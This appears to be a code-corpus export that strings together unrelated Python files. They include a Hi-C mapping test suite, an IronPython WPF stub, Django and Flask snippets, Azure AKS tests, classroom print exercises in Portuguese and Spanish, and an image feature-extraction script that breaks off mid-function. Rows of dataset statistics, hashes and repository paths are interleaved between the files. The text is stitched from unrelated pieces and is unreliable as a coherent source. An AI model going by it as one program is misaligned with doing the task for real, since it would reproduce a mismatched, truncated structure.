    genome_gem_idx = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem.gz"
    input_files = {
        "genome": genome_fa
    }
    output_files = {
        "index": genome_gem_idx,
        "genome_gem": genome_gem_fa
    }
    metadata = {
        "genome": Metadata(
            "Assembly", "fasta", genome_fa, None,
            {'assembly': 'test'}),
    }
    print(input_files, output_files)
    # Build the GEM index via the project's indexer tool; outputs land in
    # resource_path as named in output_files.
    gem_it = gemIndexerTool({"execution": resource_path})
    gem_it.run(input_files, metadata, output_files)
@pytest.mark.hic
def test_tb_extract_fastq():
    """
    Extract the compressed FASTQ files

    Decompresses the GEM index and both paired-end FASTQ files into the
    test data directory, generating the GEM index first if it is missing,
    then asserts both FASTQ files exist and are non-empty.
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
    fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
    gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"

    if not os.path.isfile(gem_file):
        generate_gem()

    # Fixed: gzip.open(..., 'rb').read() returns bytes, so the destination
    # files must be opened in binary mode ('wb'). The original opened them
    # in text mode ('w'), which raises TypeError on Python 3 (and was also
    # inconsistent with generate_gem, which already used 'wb').
    for packed in (gem_file, fastq_file_1, fastq_file_2):
        with gzip.open(packed + '.gz', 'rb') as fgz_in:
            with open(packed, 'wb') as f_out:
                f_out.write(fgz_in.read())

    assert os.path.isfile(fastq_file_1) is True
    assert os.path.getsize(fastq_file_1) > 0
    assert os.path.isfile(fastq_file_2) is True
    assert os.path.getsize(fastq_file_2) > 0
@pytest.mark.hic
def test_tb_full_mapping_frag_01():
    """
    Test case to ensure that the fragment based full mapping works as expected
    for the first paired end
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
    fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
    files = [gem_file, fastq_file_1]
    metadata = {'assembly': 'test', 'enzyme_name': 'MboI', 'windows': None}

    # NOTE(review): gem_file is rebound to the FASTQ path (files[1]) before
    # printing — preserved from the original.
    gem_file = files[1]
    print(gem_file)

    tfm1 = tbFullMappingTool()
    tfm1_files, tfm1_meta = tfm1.run(files, [], metadata)  # pylint: disable=unused-variable

    # Both the fragment-based and the full map outputs must exist and be
    # non-empty.
    for map_path in (resource_path + "tb.Human.SRR1658573_1_frag.map",
                     resource_path + "tb.Human.SRR1658573_1_full.map"):
        assert os.path.isfile(map_path) is True
        assert os.path.getsize(map_path) > 0
@pytest.mark.hic
def test_tb_full_mapping_frag_02():
    """
    Test case to ensure that the fragment based full mapping works as expected
    for the second paired end
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
    fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
    files = [gem_file, fastq_file_2]
    metadata = {'assembly': 'test', 'enzyme_name': 'MboI', 'windows': None}

    # NOTE(review): gem_file is rebound to the FASTQ path (files[1]) before
    # printing — preserved from the original.
    gem_file = files[1]
    print(gem_file)

    tfm2 = tbFullMappingTool()
    tfm2_files, tfm2_meta = tfm2.run(files, [], metadata)  # pylint: disable=unused-variable

    # Both the fragment-based and the full map outputs must exist and be
    # non-empty.
    for map_path in (resource_path + "tb.Human.SRR1658573_2_frag.map",
                     resource_path + "tb.Human.SRR1658573_2_full.map"):
        assert os.path.isfile(map_path) is True
        assert os.path.getsize(map_path) > 0
@pytest.mark.hic
def test_tb_full_mapping_iter_01():
    """
    Test case to ensure that the iterative based full mapping works as expected
    for the first paired end
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
    fastq_file_1 = resource_path + "tb.Human.SRR1658573_1.fastq"
    files = [gem_file, fastq_file_1]
    metadata = {
        'assembly': 'test',
        # 'enzyme_name': 'MboI',
        'windows': ((1, 25), (1, 50), (1, 75), (1, 100))
    }

    # NOTE(review): gem_file is rebound to the FASTQ path (files[1]) before
    # printing — preserved from the original.
    gem_file = files[1]
    print(gem_file)

    tfm1 = tbFullMappingTool()
    tfm1_files, tfm1_meta = tfm1.run(files, [], metadata)  # pylint: disable=unused-variable

    # One output map per iterative window size; each must exist and be
    # non-empty.
    for size in (25, 50, 75, 100):
        map_path = resource_path + "tb.Human.SRR1658573_1_full_1-{0}.map".format(size)
        assert os.path.isfile(map_path) is True
        assert os.path.getsize(map_path) > 0
@pytest.mark.hic
def test_tb_full_mapping_iter_02():
    """
    Test case to ensure that the iterative based full mapping works as expected
    for the second paired end
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    gem_file = resource_path + "tb.Human.GCA_000001405.22_gem.fasta.gem"
    fastq_file_2 = resource_path + "tb.Human.SRR1658573_2.fastq"
    files = [gem_file, fastq_file_2]
    metadata = {
        'assembly': 'test',
        # 'enzyme_name': 'MboI',
        'windows': ((1, 25), (1, 50), (1, 75), (1, 100))
    }

    # NOTE(review): gem_file is rebound to the FASTQ path (files[1]) before
    # printing — preserved from the original.
    gem_file = files[1]
    print(gem_file)

    tfm2 = tbFullMappingTool()
    tfm2_files, tfm2_meta = tfm2.run(files, [], metadata)  # pylint: disable=unused-variable

    # One output map per iterative window size; each must exist and be
    # non-empty.
    for size in (25, 50, 75, 100):
        map_path = resource_path + "tb.Human.SRR1658573_2_full_1-{0}.map".format(size)
        assert os.path.isfile(map_path) is True
        assert os.path.getsize(map_path) > 0
| 29.474903
| 92
| 0.667802
| 1,113
| 7,634
| 4.345013
| 0.151842
| 0.052109
| 0.069479
| 0.102151
| 0.766749
| 0.766543
| 0.750414
| 0.740488
| 0.717122
| 0.674318
| 0
| 0.067269
| 0.217186
| 7,634
| 258
| 93
| 29.589147
| 0.741968
| 0.169767
| 0
| 0.592357
| 0
| 0
| 0.175109
| 0.139411
| 0
| 0
| 0
| 0
| 0.178344
| 1
| 0.038217
| false
| 0
| 0.044586
| 0
| 0.082803
| 0.038217
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dec2a1bd593f111e4b4ee1cf51427f800b4678c4
| 2,460
|
py
|
Python
|
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2017-07-25T14:30:18.000Z
|
2017-07-25T14:30:18.000Z
|
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/System/Windows/Media/__init___parts/Int32CollectionConverter.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
# Auto-generated IronPython stub for WPF's Int32CollectionConverter.
# Every method body is a placeholder ('pass'); the docstrings describe
# the underlying .NET API surface for IDE/tooling consumption.
class Int32CollectionConverter(TypeConverter):
    """
    Converts an System.Windows.Media.Int32Collection to and from other data types.
    Int32CollectionConverter()
    """
    def CanConvertFrom(self, *__args):
        """
        CanConvertFrom(self: Int32CollectionConverter,context: ITypeDescriptorContext,sourceType: Type) -> bool
        Determines if the converter can convert an object of the given type to an
        instance of System.Windows.Media.Int32Collection.
        context: Describes the context information of a type.
        sourceType: The type of the source that is being evaluated for conversion.
        Returns: true if the converter can convert the provided type to an instance of
        System.Windows.Media.Int32Collection; otherwise,false.
        """
        pass

    def CanConvertTo(self, *__args):
        """
        CanConvertTo(self: Int32CollectionConverter,context: ITypeDescriptorContext,destinationType: Type) -> bool
        Determines if the converter can convert an System.Windows.Media.Int32Collection
        to a given data type.
        context: The context information of a type.
        destinationType: The desired type to evaluate the conversion to.
        Returns: true if an System.Windows.Media.Int32Collection can convert to destinationType;
        otherwise false.
        """
        pass

    def ConvertFrom(self, *__args):
        """
        ConvertFrom(self: Int32CollectionConverter,context: ITypeDescriptorContext,culture: CultureInfo,value: object) -> object
        Attempts to convert a specified object to an
        System.Windows.Media.Int32Collection instance.
        context: Context information used for conversion.
        culture: Cultural information that is respected during conversion.
        value: The object being converted.
        Returns: A new instance of System.Windows.Media.Int32Collection.
        """
        pass

    def ConvertTo(self, *__args):
        """
        ConvertTo(self: Int32CollectionConverter,context: ITypeDescriptorContext,culture: CultureInfo,value: object,destinationType: Type) -> object
        Attempts to convert an instance of System.Windows.Media.Int32Collection to a
        specified type.
        context: Context information used for conversion.
        culture: Cultural information that is respected during conversion.
        value: System.Windows.Media.Int32Collection to convert.
        destinationType: Type being evaluated for conversion.
        Returns: A new instance of the destinationType.
        """
        pass
| 38.4375
| 144
| 0.731707
| 269
| 2,460
| 6.66171
| 0.249071
| 0.06529
| 0.090402
| 0.165737
| 0.564732
| 0.440848
| 0.343192
| 0.31808
| 0.222098
| 0.116071
| 0
| 0.015291
| 0.202439
| 2,460
| 63
| 145
| 39.047619
| 0.898063
| 0.83252
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
def199b18476835b94c17d541c549120ce3088e7
| 22
|
py
|
Python
|
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | null | null | null |
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | null | null | null |
hej.py
|
TobePo/Exercise2
|
338b00db3c968fb22f3a7b50dc7e7911fb211d3a
|
[
"MIT"
] | 1
|
2020-03-03T15:30:50.000Z
|
2020-03-03T15:30:50.000Z
|
# Fixed: the first line was print('hej) — an unterminated string literal
# that made the whole file a SyntaxError.
print('hej')
print('2')
| 11
| 11
| 0.636364
| 4
| 22
| 3.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0.045455
| 22
| 2
| 12
| 11
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
7244f2898200ec771f82ad9411e85f0feee5f0bb
| 171
|
py
|
Python
|
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
ex112/teste.py
|
BrianBeyer/pythonExercicios
|
062e2c6a9e6e6f513185f1fb1d4269d8ca1d9e89
|
[
"MIT"
] | null | null | null |
# Exercise 112 (original comment: "#112")
from ex112.utilidadescev import moeda
from ex112.utilidadescev import dado
# Read a monetary value from the user (prompt kept in Portuguese — it is a
# runtime string) and print a currency summary via the moeda helper.
p = dado.leiadinheiro(input('Digite o preço: R$'))
moeda.resumo(p,1,2)# still not working (translated from "ainda nao funciona")
| 28.5
| 50
| 0.777778
| 27
| 171
| 4.925926
| 0.740741
| 0.135338
| 0.330827
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072368
| 0.111111
| 171
| 6
| 51
| 28.5
| 0.802632
| 0.128655
| 0
| 0
| 0
| 0
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
9d0fa6eccc397b7a33c1cc275643484941b4ceb9
| 126
|
py
|
Python
|
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
refugio/apps/mascota/admin.py
|
sebas095/DjangoCF
|
42c359da6a92a093d17d6b8ca8dd1d2d7a161983
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Vacuna, Mascota

# Expose both models in the Django admin site with the default ModelAdmin
# (no custom list_display / search configuration).
admin.site.register(Vacuna)
admin.site.register(Mascota)
| 25.2
| 35
| 0.825397
| 18
| 126
| 5.777778
| 0.555556
| 0.173077
| 0.326923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087302
| 126
| 5
| 36
| 25.2
| 0.904348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
19bca054eb26386d70e60cb1f67c135f99cd6fbb
| 2,296
|
py
|
Python
|
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | null | null | null |
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | null | null | null |
database_study_police/users/serializers.py
|
dustyRAIN/Study_Police
|
9605a1e548732be2982abfbe7c66acd492710d23
|
[
"MIT"
] | 1
|
2021-07-25T19:54:02.000Z
|
2021-07-25T19:54:02.000Z
|
from rest_framework import serializers
from . import models
from rest_auth.registration.serializers import RegisterSerializer
class CustomRegisterSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
name = serializers.CharField(required=True)
gender = serializers.IntegerField(required=True)
image = serializers.ImageField(required=True)
def get_cleaned_data(self):
super(CustomRegisterSerializer, self).get_cleaned_data()
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'name': self.validated_data.get('name', ''),
'gender': self.validated_data.get('gender', ''),
'image': self.validated_data.get('image', ''),
}
class RegisterWOPassSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
name = serializers.CharField(required=True)
gender = serializers.IntegerField(required=True)
image = serializers.ImageField(required=True)
def get_cleaned_data(self):
super(RegisterWOPassSerializer, self).get_cleaned_data()
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'name': self.validated_data.get('name', ''),
'gender': self.validated_data.get('gender', ''),
'image': self.validated_data.get('image', ''),
}
class CustomUserDetailsSerializer(serializers.ModelSerializer):
class Meta:
model = models.CustomUser
fields = ('id','email','name','gender', 'image')
read_only_fields = ('email',)
class DemoPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = models.DemoPhoto
fields = ['name', 'size', 'image']
class EmailTakenSerializer(serializers.ModelSerializer):
class Meta:
model = models.EmailByProvider
fields = ['email', 'provider']
| 30.613333
| 66
| 0.650261
| 213
| 2,296
| 6.887324
| 0.225352
| 0.106339
| 0.139059
| 0.163599
| 0.723926
| 0.723926
| 0.629857
| 0.629857
| 0.629857
| 0.629857
| 0
| 0.003346
| 0.219077
| 2,296
| 75
| 67
| 30.613333
| 0.814835
| 0
| 0
| 0.604167
| 0
| 0
| 0.087505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.125
| 0.0625
| 0
| 0.520833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
19c4aadf35a31c39b25e719c43ef6e8548ebb7f0
| 144
|
py
|
Python
|
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | null | null | null |
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | null | null | null |
whatifstocks/stockanalysis/views.py
|
Jaza/whatifstocks
|
59568635284e6d0a45324b6f5e3beb51c965a234
|
[
"Apache-2.0"
] | 1
|
2020-04-20T09:20:25.000Z
|
2020-04-20T09:20:25.000Z
|
"""Views related to stockanalysis."""
from flask import Blueprint
blueprint = Blueprint('stockanalysis', __name__, static_folder='../static')
| 24
| 75
| 0.756944
| 15
| 144
| 6.933333
| 0.733333
| 0.346154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 144
| 5
| 76
| 28.8
| 0.806202
| 0.215278
| 0
| 0
| 0
| 0
| 0.205607
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
19fd37bb41ca3364e6bac81e9b764d2e4f657813
| 1,465
|
py
|
Python
|
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
Examen1.py
|
Sharlycer/SP
|
f337765720d96149b1c70a8be472a8e7198996c5
|
[
"Apache-1.1"
] | null | null | null |
print("Nombre del alumno; Sharlene Miorzlava Cervantes Vazquez")
print("lugar de residencia: El refugio de Agua zarca")
print("Fecha de Nacimiento: 24 de enero del año 2002")
print("Color favorito: Verde")
print("Animal Favorito: Panda")
print("¿Que es un Programa? Es una serie de instruccionespreviamente codificadas, las cuales permitenrealizar una tarea especifica en una computadora. Ha esta serie de intrucciones previamente codificadas, se les conoce como codigo fuente")
print("¿Por que es importante la programacion? Porque gracias a ella se han desarrollado herramientas y soluciones que le han facilitado la vida al hombre, un claro ejemplo de esto es la comunicacion, tener todo a la mano.")
print("Herencia: Heredar atributos y metodos de otra clase; Jerarquias que presentan la relacion ordenada de las clases que estan relacionadas, reutilizacin de codigos o programas")
print("Poliformismo: Formas y estapas diferentes, es la habilidad de un objeto de realidar una accion de diferentes maneras utilizando metodos igual")
print("Abstraccion: Principio por el cual se descarta toda aquella informacion que no resulta relevante en un contexto en particular, entatizando algunos de las detalles o propiedades de los objetos")
print("Almecenar y orgamizar las caractersticas y funcionalidades de los objetos representadolas por medio de atribulos y metodos; garantiza la integridad de los datos que contiene un objeto, osea que los dotos sean correctos")
| 133.181818
| 240
| 0.812969
| 220
| 1,465
| 5.422727
| 0.627273
| 0.012573
| 0.020117
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004766
| 0.140614
| 1,465
| 11
| 241
| 133.181818
| 0.941223
| 0
| 0
| 0
| 0
| 0.545455
| 0.924966
| 0.016371
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.090909
| 0
| 0.090909
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
df96a125faf89e6ebdfe82941a9290d947e1f32b
| 1,656
|
py
|
Python
|
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/tests/latest/test_aks_diagnostics.py
|
peterbom/azure-cli-extensions
|
c8a0fc8ea8812005fd75017f6797b5ab3dfe8257
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
import azext_aks_preview.aks_diagnostics as commands
class TestTrimContainerName(unittest.TestCase):
def test_trim_fqdn_name_containing_hcp(self):
container_name = 'abcdef-dns-ed55ba6d-hcp-centralus-azmk8s-io'
expected_container_name = 'abcdef-dns-ed55ba6d'
trim_container_name = commands._trim_fqdn_name_containing_hcp(container_name)
self.assertEqual(expected_container_name, trim_container_name)
def test_trim_fqdn_name_trailing_dash(self):
container_name = 'dns-ed55ba6ad-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink-centralus-azmk8s-io'
expected_container_name = 'dns-ed55ba6ad-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink'
trim_container_name = commands._trim_fqdn_name_containing_hcp(
container_name)
self.assertEqual(expected_container_name, trim_container_name)
def test_trim_fqdn_name_not_containing_hcp(self):
container_name = 'abcdef-dns-ed55ba6d-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privatelink-centralus-azmk8s-io'
expected_container_name = 'abcdef-dns-ed55ba6d-e48fe2bd-b4bc-4aac-bc23-29bc44154fe1-privat'
trim_container_name = commands._trim_fqdn_name_containing_hcp(container_name)
self.assertEqual(expected_container_name, trim_container_name)
| 57.103448
| 115
| 0.701087
| 183
| 1,656
| 5.994536
| 0.31694
| 0.213309
| 0.065634
| 0.080219
| 0.770283
| 0.752963
| 0.752963
| 0.752963
| 0.694622
| 0.644485
| 0
| 0.055632
| 0.120773
| 1,656
| 28
| 116
| 59.142857
| 0.697802
| 0.202899
| 0
| 0.263158
| 0
| 0.105263
| 0.271483
| 0.257034
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.157895
| false
| 0
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfab4c112be45ea8fed8554ee4fb67d1f1cc85ed
| 14,286
|
py
|
Python
|
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | 1
|
2019-12-12T14:24:47.000Z
|
2019-12-12T14:24:47.000Z
|
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | null | null | null |
result_generator/result_feature_db/index.py
|
shijack/feature_extract
|
2c45750ea42a30a1f0b5cbe305edc4c8ab0461d7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Author: shijack
import sys
import time
sys.path.append('../../')
import os
from nets import resnet_v2
from net_model.extract_cnn_vgg16 import VGG16_MODIFIED
import h5py
import numpy as np
import tensorflow as tf
from keras.preprocessing import image
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from util import utils
from net_model.extract_cnn_densenet_keras import DenseNETMAX
from z_extend_rmac.rmac import rmac
from z_extend_rmac.get_regions import rmac_regions, get_size_vgg_feat_map
def feature_generator_densenet(file_img, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
start_time = time.time()
model = DenseNETMAX()
for i, img_path in enumerate(img_list):
norm_feat = model.extract_feat(img_path)
# dct_feat = np.multiply(np.array(DCT_binaray(img_path)),np.full((1,256),0.01))
# dct_feat = get_dct_feature(img_path)
# dct_feat = DCT_binaray(img_path)
# final_feat = np.append(dct_feat,norm_feat)
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([32,],dtype=np.float32)))
feats.append(norm_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
# directory for storing extracted features
output = file_feature_output
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_rmac_vgg16(dir_img, file_feature_output, is_split_dir=False):
'''
按照文件夹目录,每个目录生成一个文件夹所有图片特征的集合.bow文件,format:每行一个图片的特征。
:param dir_img:
:param file_feature_output:
:param is_split_dir:
:return:
'''
path = dir_img
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
if is_split_dir:
model = rmac.rmac(20)
for child_dirs in utils.get_dirs_child(path):
img_list = utils.get_all_files_suffix(child_dirs)
start_time = time.time()
feats = []
names = []
for i, img_path in enumerate(img_list):
img = image.load_img(img_path)
# Resize
scale = utils.IMG_SIZE / max(img.size)
new_size = (int(np.ceil(scale * img.size[0])), int(np.ceil(scale * img.size[1])))
# print('Original size: %s, Resized image: %s' % (str(img.size), str(new_size)))
img = img.resize(new_size)
# Mean substraction
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = utils.preprocess_image(x)
# Load RMAC model
Wmap, Hmap = get_size_vgg_feat_map(x.shape[2], x.shape[1])
regions = rmac_regions(Wmap, Hmap, 3)
# Compute RMAC vector
# print('Extracting RMAC from image...')
# print (len(regions))
norm_feat = model.predict([x, np.expand_dims(regions, axis=0)])
norm_feat = norm_feat.reshape((-1,))
img_name = os.path.split(img_path)[1]
final_feat = np.hstack((norm_feat.reshape((-1,)), np.zeros([288, ], dtype=np.float32)))
feats.append(final_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
feats_6 = feats.astype('float32')
np.savetxt(child_dirs + "/" + child_dirs.split("/")[-1] + '.bow', feats_6, fmt='%f')
end_time = time.time()
print ('the total time cnsumed is %d\n', (end_time - start_time))
else:
feats = []
names = []
start_time = time.time()
model = rmac.rmac(20)
img_list = utils.get_all_files_suffix(dir_img)
for i, img_path in enumerate(img_list):
img = image.load_img(img_path)
# Resize
scale = utils.IMG_SIZE / max(img.size)
new_size = (int(np.ceil(scale * img.size[0])), int(np.ceil(scale * img.size[1])))
# print('Original size: %s, Resized image: %s' % (str(img.size), str(new_size)))
img = img.resize(new_size)
# Mean substraction
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = utils.preprocess_image(x)
# Load RMAC model
Wmap, Hmap = get_size_vgg_feat_map(x.shape[2], x.shape[1])
regions = rmac_regions(Wmap, Hmap, 3)
# Compute RMAC vector
# print('Extracting RMAC from image...')
# print (len(regions))
norm_feat = model.predict([x, np.expand_dims(regions, axis=0)])
norm_feat = norm_feat.reshape((-1,))
img_name = os.path.split(img_path)[1]
final_feat = np.hstack((norm_feat.reshape((-1,)), np.zeros([288, ], dtype=np.float32)))
feats.append(final_feat)
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_vae(file_img, file_meta_graph, file_ckpt, file_feature_output):
